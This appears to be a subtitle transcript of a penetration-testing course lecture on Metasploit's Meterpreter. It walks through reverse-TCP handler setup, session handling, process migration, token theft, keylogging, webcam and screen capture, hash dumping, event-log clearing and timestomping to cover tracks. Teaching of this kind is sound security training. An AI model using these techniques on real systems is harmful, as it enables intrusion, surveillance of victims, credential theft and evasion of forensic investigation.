1 1 00:00:01,492 --> 00:00:04,216 line:15% Meterpreter, a crowd favorite for payloads. 2 2 00:00:04,216 --> 00:00:06,234 line:15% So we've talked about bind and reverse payloads, 3 3 00:00:06,234 --> 00:00:08,140 line:15% and now we're gonna talk about Meterpreter. 4 4 00:00:08,140 --> 00:00:10,750 So Meterpreter is gonna be used in our gaining access 5 5 00:00:10,750 --> 00:00:11,786 and then we're gonna use that throughout 6 6 00:00:11,786 --> 00:00:13,556 the rest of our stages, our escalation of privilege, 7 7 00:00:13,556 --> 00:00:15,595 maintaining access, and covering our tracks 8 8 00:00:15,595 --> 00:00:17,080 and setting our back doors. 9 9 00:00:17,080 --> 00:00:18,771 Now, what is Meterpreter? 10 10 00:00:18,771 --> 00:00:21,750 Meterpreter is a multi-faceted payload that operates via 11 11 00:00:21,750 --> 00:00:25,177 a Dynamic Link Library injection, so a DLL injection. 12 12 00:00:25,177 --> 00:00:27,726 And it's included as part of our Metasploit Framework, 13 13 00:00:27,726 --> 00:00:30,825 which is that MSF that we're using inside Kali Linux. 14 14 00:00:30,825 --> 00:00:32,886 That's gonna allow us to load it 15 15 00:00:32,886 --> 00:00:35,331 and attack onto a victim platform. 16 16 00:00:35,331 --> 00:00:37,695 The nice thing about Meterpreter is that it 17 17 00:00:37,695 --> 00:00:39,591 resides in volatile memory of the target 18 18 00:00:39,591 --> 00:00:41,985 and it leaves no traces on the hard drive. 19 19 00:00:41,985 --> 00:00:43,663 So, it's difficult to detect when you're using 20 20 00:00:43,663 --> 00:00:45,546 conventional forensic techniques, 21 21 00:00:45,546 --> 00:00:47,617 which makes it great for us an attacker, 22 22 00:00:47,617 --> 00:00:49,738 not so great for us if we're the defenders. 23 23 00:00:49,738 --> 00:00:51,411 The nice thing about Meterpreter is that it uses 24 24 00:00:51,411 --> 00:00:55,807 DLL injection to get exploited processes, this getpid. 25 25 00:00:55,807 --> 00:00:58,221 Now what happens is it's gonna actually hook the Windows 32 26 26 00:00:58,221 --> 00:01:01,057 API LoadLibrary, and by doing that it's gonna change 27 27 00:01:01,057 --> 00:01:05,331 these lower level APIs inside of Windows to allow us to load 28 28 00:01:05,331 --> 00:01:08,129 the met server DLL from memory. 29 29 00:01:08,129 --> 00:01:10,844 By keeping it all in memory, it keeps it out of the logs, 30 30 00:01:10,844 --> 00:01:12,870 it keeps it off the hard drive, it makes it very hard 31 31 00:01:12,870 --> 00:01:15,991 for the defenders to go back and find it afterwards. 32 32 00:01:15,991 --> 00:01:17,378 The other great thing we're gonna find with Meterpreter 33 33 00:01:17,378 --> 00:01:20,049 is that it just has loads of functionality for us. 34 34 00:01:20,049 --> 00:01:22,981 So, when we set up Meterpreter, we're gonna do this inside 35 35 00:01:22,981 --> 00:01:24,511 the Metasploit framework. 36 36 00:01:24,511 --> 00:01:26,774 So if we're inside the the msf console, 37 37 00:01:26,774 --> 00:01:30,074 we're gonna do use exploit slash multi handler, 38 38 00:01:30,074 --> 00:01:31,978 we're gonna then set our payload, 39 39 00:01:31,978 --> 00:01:36,118 so set payload windows/meterpreter/reverse tcp. 40 40 00:01:36,118 --> 00:01:38,360 We're gonna set our host and our port, 41 41 00:01:38,360 --> 00:01:41,076 so that's our Kali IP and whatever port we're gonna use, 42 42 00:01:41,076 --> 00:01:43,743 2541, 4444, 443, whatever it is, 43 43 00:01:44,826 --> 00:01:46,588 and then we're gonna do our exploit. 44 44 00:01:46,588 --> 00:01:47,870 Now, once we've set our payload, 45 45 00:01:47,870 --> 00:01:49,828 our listening host, and listening port, 46 46 00:01:49,828 --> 00:01:54,194 we'll be able to receive a callback from our exploited host. 47 47 00:01:54,194 --> 00:01:55,934 Now once you get you get into Meterpreter, 48 48 00:01:55,934 --> 00:01:57,275 you'll see there's a ton of different commands. 49 49 00:01:57,275 --> 00:01:58,806 Now I'm not gonna show you all of them, 50 50 00:01:58,806 --> 00:02:01,348 but if you wanna see them all just type help or "?" 51 51 00:02:01,348 --> 00:02:03,486 once you get to a Meterpreter prompt. 52 52 00:02:03,486 --> 00:02:05,036 So, background is gonna move the 53 53 00:02:05,036 --> 00:02:06,636 current session to the background, 54 54 00:02:06,636 --> 00:02:09,568 and this is gonna allow us to hack multiple boxes at once. 55 55 00:02:09,568 --> 00:02:11,872 So, if I have a first exploited target, 56 56 00:02:11,872 --> 00:02:14,518 I can type "background," set up a second attack, 57 57 00:02:14,518 --> 00:02:16,732 go after a second box, and then background that 58 58 00:02:16,732 --> 00:02:17,886 and go back to the first one. 59 59 00:02:17,886 --> 00:02:20,766 And I can go between multiple different targets at one time. 60 60 00:02:20,766 --> 00:02:22,086 This is very useful to be able to 61 61 00:02:22,086 --> 00:02:24,194 interact with background sessions. 62 62 00:02:24,194 --> 00:02:25,961 Sessions: if I type in sessions, 63 63 00:02:25,961 --> 00:02:28,296 I'll be able to see all the active sessions I have. 64 64 00:02:28,296 --> 00:02:29,616 So again, I can have two, three, 65 65 00:02:29,616 --> 00:02:31,318 four different targets online, 66 66 00:02:31,318 --> 00:02:33,230 and have active connections with each of them, 67 67 00:02:33,230 --> 00:02:34,978 and then switch between them. 68 68 00:02:34,978 --> 00:02:36,448 I can also kill those sessions, 69 69 00:02:36,448 --> 00:02:38,998 kill all of them, or kill specific sessions. 70 70 00:02:38,998 --> 00:02:41,496 So to do that, I'm gonna use sessions-i, 71 71 00:02:41,496 --> 00:02:43,115 and then the number that's interact, 72 72 00:02:43,115 --> 00:02:45,485 so if I was gonna interact with my first session, 73 73 00:02:45,485 --> 00:02:47,406 it'd be session-i1. 74 74 00:02:47,406 --> 00:02:48,446 Then if I wanted to go to the other one, 75 75 00:02:48,446 --> 00:02:50,892 I'd type background sessions-i2, 76 76 00:02:50,892 --> 00:02:52,512 and that would get me to the second one. 77 77 00:02:52,512 --> 00:02:53,906 If I want to kill that connection, 78 78 00:02:53,906 --> 00:02:56,382 I would just type sessions -k1, 79 79 00:02:56,382 --> 00:02:58,248 and that would kill the connection to one. 80 80 00:02:58,248 --> 00:02:59,458 If I want to kill all of them, 81 81 00:02:59,458 --> 00:03:00,875 it's sessions -K. 82 82 00:03:03,417 --> 00:03:05,226 So some other Meterpreter commands that are helpful: 83 83 00:03:05,226 --> 00:03:08,346 the Help, the Load, the Migrate, and the Quit. 84 84 00:03:08,346 --> 00:03:09,860 So when you type in Help, you're gonna get the list 85 85 00:03:09,860 --> 00:03:12,268 of all the commands that Meterpreter understands. 86 86 00:03:12,268 --> 00:03:13,580 This is useful when you're first starting out 87 87 00:03:13,580 --> 00:03:16,265 to start learning how Meterpreter works and what different 88 88 00:03:16,265 --> 00:03:17,623 things there are that you can do. 89 89 00:03:17,623 --> 00:03:18,779 These screen shots you're seeing now 90 90 00:03:18,779 --> 00:03:20,960 come from that Help menu. 91 91 00:03:20,960 --> 00:03:23,323 Now, if we go into Migrate, that's gonna migrate 92 92 00:03:23,323 --> 00:03:25,302 our server from one process to another. 93 93 00:03:25,302 --> 00:03:26,331 Now when we talk about server, 94 94 00:03:26,331 --> 00:03:28,551 we're talking about the Meterpreter server. 95 95 00:03:28,551 --> 00:03:30,785 That's the connection that we have with our victim. 96 96 00:03:30,785 --> 00:03:32,369 So, we're gonna fork our Meterpreter 97 97 00:03:32,369 --> 00:03:33,861 into a different process. 98 98 00:03:33,861 --> 00:03:35,713 So, for instance, if my attack went in 99 99 00:03:35,713 --> 00:03:38,729 through Internet Explorer, that tends to crash a lot. 100 100 00:03:38,729 --> 00:03:40,565 So I would wanna migrate out of Internet Explorer 101 101 00:03:40,565 --> 00:03:42,784 into something more stable, like Explorer, 102 102 00:03:42,784 --> 00:03:45,510 which is the file system browser. 103 103 00:03:45,510 --> 00:03:47,179 You also can do this while you're doing your 104 104 00:03:47,179 --> 00:03:49,430 maintaining access and covering our tracks phases, 105 105 00:03:49,430 --> 00:03:51,928 we'll talk about that more later, to hide ourself, 106 106 00:03:51,928 --> 00:03:54,344 or to migrate into another process that might have better 107 107 00:03:54,344 --> 00:03:58,730 permissions that gives us higher level access. 108 108 00:03:58,730 --> 00:04:00,470 So, here's an example of Migrate: 109 109 00:04:00,470 --> 00:04:03,064 so you'll see up top we have some legitimate processes, 110 110 00:04:03,064 --> 00:04:05,794 we have win logon, lass, service host, 111 111 00:04:05,794 --> 00:04:08,083 explorer, and web 32 res. 112 112 00:04:08,083 --> 00:04:10,491 Now, when I initially broke in, 113 113 00:04:10,491 --> 00:04:12,973 I'm gonna break in using a calc program, 114 114 00:04:12,973 --> 00:04:16,677 a calculator program, so therefore I'm now sitting in Calc. 115 115 00:04:16,677 --> 00:04:18,231 Now, if I migrate you're gonna see that 116 116 00:04:18,231 --> 00:04:21,253 the Calc is gonna go away, but I'm gonna maintain my access. 117 117 00:04:21,253 --> 00:04:23,255 And the way we do that is my doing Migrate, 118 118 00:04:23,255 --> 00:04:25,881 and we'll migrate from the PID of 3028 119 119 00:04:25,881 --> 00:04:27,297 into where I wanna go, 120 120 00:04:27,297 --> 00:04:31,263 which might be the Explorer PID of 1064. 121 121 00:04:31,263 --> 00:04:33,086 Some other nice things that Meterpreter allows you to do 122 122 00:04:33,086 --> 00:04:35,171 is you can download and upload files. 123 123 00:04:35,171 --> 00:04:37,191 You can also get your lurking directories 124 124 00:04:37,191 --> 00:04:38,623 and figure out where you are. 125 125 00:04:38,623 --> 00:04:40,683 Some exploits you do are not gonna give you 126 126 00:04:40,683 --> 00:04:42,590 the path name of where you are. 127 127 00:04:42,590 --> 00:04:45,373 So you're not gonna see this C:/32. 128 128 00:04:45,373 --> 00:04:47,397 You might just get a blank prompt. 129 129 00:04:47,397 --> 00:04:49,743 So by using the, printing the working directory, 130 130 00:04:49,743 --> 00:04:50,995 I'll be able to figure out where I am 131 131 00:04:50,995 --> 00:04:52,481 on the victim's system. 132 132 00:04:52,481 --> 00:04:54,755 Now, the download and upload work just like they say. 133 133 00:04:54,755 --> 00:04:56,247 You type in download and a file name 134 134 00:04:56,247 --> 00:04:57,851 and it will take that file from the victim 135 135 00:04:57,851 --> 00:04:59,951 and bring it to your local Kali machine. 136 136 00:04:59,951 --> 00:05:02,007 That way, you can do that information gathering, 137 137 00:05:02,007 --> 00:05:03,319 and be able to use that as part 138 138 00:05:03,319 --> 00:05:05,819 of your exploitation later on. 139 139 00:05:06,776 --> 00:05:09,761 Some other commands we have, we have arp and ifconfig and 140 140 00:05:09,761 --> 00:05:13,083 ipconfig and netstat and port forwarding and route. 141 141 00:05:13,083 --> 00:05:14,974 We're gonna talk about more of these later on in other 142 142 00:05:14,974 --> 00:05:17,284 lectures as we start playing through some of these commands, 143 143 00:05:17,284 --> 00:05:19,143 but this is really just some of your networking commands 144 144 00:05:19,143 --> 00:05:21,893 that you have inside Meterpreter. 145 145 00:05:23,508 --> 00:05:24,574 Here's some additional commands 146 146 00:05:24,574 --> 00:05:25,818 that we have inside Meterpreter. 147 147 00:05:25,818 --> 00:05:27,064 We have clear ev. 148 148 00:05:27,064 --> 00:05:28,338 This is clearing your event log. 149 149 00:05:28,338 --> 00:05:30,762 This is useful during covering your tracks phase. 150 150 00:05:30,762 --> 00:05:34,024 We also can drop tokens or steal tokens so that we can start 151 151 00:05:34,024 --> 00:05:36,424 pretending that we're some other user on the system. 152 152 00:05:36,424 --> 00:05:38,458 So for instance if I got onto a user box 153 153 00:05:38,458 --> 00:05:40,954 and the domain admin had also been on that box, 154 154 00:05:40,954 --> 00:05:42,724 I might be able to steal their token 155 155 00:05:42,724 --> 00:05:44,314 and impersonate them and start going around 156 156 00:05:44,314 --> 00:05:46,828 the network as if I was the domain admin. 157 157 00:05:46,828 --> 00:05:49,354 We can execute commands, we can get the PIDs 158 158 00:05:49,354 --> 00:05:51,274 so we know what process we're currently in, 159 159 00:05:51,274 --> 00:05:52,888 we can migrate into other processes, 160 160 00:05:52,888 --> 00:05:55,940 we can reboot the computer, we can revert ourself 161 161 00:05:55,940 --> 00:05:59,180 back to the initial user we were. 162 162 00:05:59,180 --> 00:06:00,800 We can drop into a shell. 163 163 00:06:00,800 --> 00:06:03,538 Just typing shell will get us to the C prompt, for instance. 164 164 00:06:03,538 --> 00:06:05,022 There's lots of different things that we can do 165 165 00:06:05,022 --> 00:06:06,200 and as you play with Meterpreter 166 166 00:06:06,200 --> 00:06:08,840 you're gonna get better and better at using it. 167 167 00:06:08,840 --> 00:06:10,580 So one of the things I really like with Meterpreter is that 168 168 00:06:10,580 --> 00:06:13,114 it comes with built-in keystroke capturing. 169 169 00:06:13,114 --> 00:06:15,567 So, if I have gotten onto a user's machine, 170 170 00:06:15,567 --> 00:06:17,750 I can actually use keyscan start, 171 171 00:06:17,750 --> 00:06:20,558 and start a keylogger on that machine. 172 172 00:06:20,558 --> 00:06:22,417 So if they start going into their bank accounts, 173 173 00:06:22,417 --> 00:06:24,924 their Facebook, their email, I start capturing 174 174 00:06:24,924 --> 00:06:27,668 all those keystrokes, the user names, the passwords, 175 175 00:06:27,668 --> 00:06:29,138 the things that they're writing. 176 176 00:06:29,138 --> 00:06:31,222 And when I go ahead and do a key scan dump 177 177 00:06:31,222 --> 00:06:33,450 I'll be able to see that on my screen. 178 178 00:06:33,450 --> 00:06:35,002 Some other things that you can do here is 179 179 00:06:35,002 --> 00:06:36,908 you can actually do a screen shot, 180 180 00:06:36,908 --> 00:06:38,932 and by doing a screen shot, you can actually capture 181 181 00:06:38,932 --> 00:06:41,669 what's on their screen and see what they're seeing, 182 182 00:06:41,669 --> 00:06:43,768 and you'll get that as a ping image, 183 183 00:06:43,768 --> 00:06:45,870 and that'll be again on your local KALI machine, 184 184 00:06:45,870 --> 00:06:47,730 so you'll see what the victim is seeing. 185 185 00:06:47,730 --> 00:06:50,070 It allows you to see in our Graphical User Environment 186 186 00:06:50,070 --> 00:06:53,722 world what that user is seeing in their world. 187 187 00:06:53,722 --> 00:06:55,671 And so again, to use the keylogger, 188 188 00:06:55,671 --> 00:06:57,930 key scan start starts your keylogging, 189 189 00:06:57,930 --> 00:07:00,060 key scan stop stops your keylogging, 190 190 00:07:00,060 --> 00:07:02,114 key scan dump shows you those keystrokes 191 191 00:07:02,114 --> 00:07:04,581 that have been captured. 192 192 00:07:04,581 --> 00:07:06,262 So, here's just a quick example on the screen 193 193 00:07:06,262 --> 00:07:08,228 of what it will look like in Meterpreter. 194 194 00:07:08,228 --> 00:07:10,754 Getuid will tell me what I am. 195 195 00:07:10,754 --> 00:07:12,660 In this case, I wanna be system. 196 196 00:07:12,660 --> 00:07:14,707 Ps tells me the processes that are open, 197 197 00:07:14,707 --> 00:07:17,318 and I'll be able to see what processes are there. 198 198 00:07:17,318 --> 00:07:19,726 Migrate pid will migrate me from the current process 199 199 00:07:19,726 --> 00:07:22,732 I'm in, that Internet Explorer process or Calc process 200 200 00:07:22,732 --> 00:07:25,356 into something like Explorer or System. 201 201 00:07:25,356 --> 00:07:27,651 Getuid verify where you should be. 202 202 00:07:27,651 --> 00:07:29,209 I wanna be the current user, because 203 203 00:07:29,209 --> 00:07:32,359 if I wanna capture somebody's keystrokes, I have to be them. 204 204 00:07:32,359 --> 00:07:35,329 So I have to migrate into a user process to do that. 205 205 00:07:35,329 --> 00:07:38,165 And now I'll be able to see if I go on a Notepad, 206 206 00:07:38,165 --> 00:07:40,189 start typing notepad on your victim box, 207 207 00:07:40,189 --> 00:07:41,585 and then you'll key scan dump, 208 208 00:07:41,585 --> 00:07:44,763 you'll be able to see all those keystrokes that you've had. 209 209 00:07:44,763 --> 00:07:46,359 You'll also see here that Meterpreter 210 210 00:07:46,359 --> 00:07:48,709 gives you the ability to actually access the webcam. 211 211 00:07:48,709 --> 00:07:51,198 You can record audio from the microphone of the webcam, 212 212 00:07:51,198 --> 00:07:53,509 you can see what webcams are available, and you can start 213 213 00:07:53,509 --> 00:07:55,459 taking snapshots from the webcam. 214 214 00:07:55,459 --> 00:07:57,035 So I can actually see the victim that I'm 215 215 00:07:57,035 --> 00:07:58,895 seeing through their computer. 216 216 00:07:58,895 --> 00:08:00,725 Now, ours is a virtual target. 217 217 00:08:00,725 --> 00:08:02,255 It doesn't have a webcam, so these will 218 218 00:08:02,255 --> 00:08:04,545 actually fail if you try it in our virtual lab, 219 219 00:08:04,545 --> 00:08:06,323 but in the real world, you can do this and start 220 220 00:08:06,323 --> 00:08:08,813 stealing pictures off their camera. 221 221 00:08:08,813 --> 00:08:10,507 Another one is elevation commands. 222 222 00:08:10,507 --> 00:08:12,001 We talked about once we gain access we wanna 223 223 00:08:12,001 --> 00:08:14,285 migrate up to a higher user level. 224 224 00:08:14,285 --> 00:08:16,403 Well, one of the ways we do that is get system. 225 225 00:08:16,403 --> 00:08:17,236 It's just automated. 226 226 00:08:17,236 --> 00:08:19,433 You type get system, and on a windows machine, 227 227 00:08:19,433 --> 00:08:23,325 it will elevate you up to a system-level user if it can. 228 228 00:08:23,325 --> 00:08:25,261 This works about 50% of the time, 229 229 00:08:25,261 --> 00:08:27,037 so it works pretty well and it's worth a shot. 230 230 00:08:27,037 --> 00:08:30,151 It will get you where you wanna go most of the time. 231 231 00:08:30,151 --> 00:08:31,425 So, some other ways that we can elevate 232 232 00:08:31,425 --> 00:08:33,645 our privileges is we can do a hash dump. 233 233 00:08:33,645 --> 00:08:34,747 Hash dump is actually gonna dump 234 234 00:08:34,747 --> 00:08:36,883 the contents of the SAM database, 235 235 00:08:36,883 --> 00:08:38,205 and we'll talk more about the SAM database 236 236 00:08:38,205 --> 00:08:40,201 when we talk about elevation of privilege later, 237 237 00:08:40,201 --> 00:08:42,601 but it's the way that Windows stores its credentials. 238 238 00:08:42,601 --> 00:08:44,183 So if I can dump the SAM database, 239 239 00:08:44,183 --> 00:08:46,335 I get the encrypted hash of all the passwords, 240 240 00:08:46,335 --> 00:08:48,224 I can then break those hashes and 241 241 00:08:48,224 --> 00:08:49,635 figure out what the passwords are, 242 242 00:08:49,635 --> 00:08:52,073 I now have additional accesses. 243 243 00:08:52,073 --> 00:08:54,165 And then finally, here at the bottom you'll see timestomp, 244 244 00:08:54,165 --> 00:08:55,877 and timestomp's really useful because 245 245 00:08:55,877 --> 00:08:58,133 as we into our covering our tracks later, 246 246 00:08:58,133 --> 00:08:59,911 we'll use timestomp to actually change 247 247 00:08:59,911 --> 00:09:02,611 the time that files were accessed. 248 248 00:09:02,611 --> 00:09:06,014 A good use of this is if I go into a logfile and edit a 249 249 00:09:06,014 --> 00:09:07,789 piece of that log, it's gonna change 250 250 00:09:07,789 --> 00:09:09,963 the date and time to the time that I edited it. 251 251 00:09:09,963 --> 00:09:12,393 Now what I wanna do is go back and timestamp it 252 252 00:09:12,393 --> 00:09:14,755 back to the last time it was actually touched, 253 253 00:09:14,755 --> 00:09:15,873 which might have been three or four weeks 254 254 00:09:15,873 --> 00:09:17,501 ago by the system administrator. 255 255 00:09:17,501 --> 00:09:19,577 And that way I can help cover my tracks further. 256 256 00:09:19,577 --> 00:09:23,744 We'll cover this again in the covering tracks lesson.